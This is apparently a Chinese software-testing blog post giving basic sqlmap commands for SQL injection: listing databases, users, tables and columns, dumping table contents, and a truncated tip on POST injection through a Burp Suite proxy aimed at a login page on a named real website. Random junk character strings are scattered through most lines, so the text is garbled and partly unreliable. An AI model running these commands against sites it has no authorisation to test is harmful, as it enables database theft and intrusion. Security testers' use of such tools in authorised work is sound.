十五年测试老手,长期负责WEB\APP 项目测试,目前主要负责团队管理工作。
sqlmap 详细用法
上一篇 /
下一篇 2015-11-06 21:06:03
/ 个人分类:APP安全
]I3U h;T0
1. 基础用法:
M2I
z"I+l$b2}0./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库
6Rx#]x3w!V$d;Fc0./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库
^!?CGa5UFx0./sqlmap.py -u “注入地址” -v 1 –users // 列数据库用户51Testing软件测试网L0G)[_;g\-~
./sqlmap.py -u “注入地址” -v 1 –current-user // 当前用户51Testing软件测试网(}!Js3t
N+ltJ
./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库” // 列举数据库的表名
)d+Z'\u{
vo0./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库” // 获取表的列名
$X:D7~Y
c1q0./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
/rbucSCB.t/d0已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、、、
Y/ES2g/aB.[Mb0
*|3A4QXl0g/oH$d02. sqlmap post注入
K zb$W`%[l2e2y0我们在使用Sqlmap进行post型注入时,
^"T!wH)`!t_ik0经常会出现请求遗漏导致注入失败的情况。
#`
z,[\%Z6@J0这里分享一个小技巧,即结合burpsuite来使用sqlmap,51Testing软件测试网Tz1w4I0JPN-c
用这种方法进行post注入测试会更准确,操作起来也非常容易。
|.eD6C/y,?9}8O+k:m01. 浏览器打开目标地址http:// www.2cto.com /Login.asp51Testing软件测试网;K
N,q rW;_sK/\X
2. 配置burp代理(127.0.0.1:8080)以拦截请求
5hu)bX&H